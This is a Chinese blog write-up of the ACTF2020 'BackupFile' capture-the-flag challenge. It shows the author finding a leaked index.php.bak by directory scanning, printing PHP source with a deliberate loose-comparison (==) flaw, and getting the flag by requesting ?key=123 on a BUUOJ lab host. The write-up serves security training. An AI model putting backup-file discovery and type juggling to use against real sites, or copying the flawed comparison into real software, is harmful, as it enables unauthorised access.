[ACTF2020 新生赛]BackupFile

博客内容涉及了一个PHP源代码的分析,其中包含了一个弱比较漏洞。作者通过访问`index.php.bak`文件并输入特定的`key`参数(如`key=123`)来触发源代码的显示,揭示了`flag`变量的使用。文章提醒读者关注代码安全,防止类似漏洞被利用,并提供了一个实际的URL以演示问题。
摘要由CSDN通过智能技术生成

打开

dir扫描发现index.php.bak文件

进入后自动下载,打开查看源代码

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

==弱比较,只需要传key=123即可

http://677a0c91-4ec2-4d9d-9cc4-91edbddedb23.node4.buuoj.cn:81/?key=123

 得到flag

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值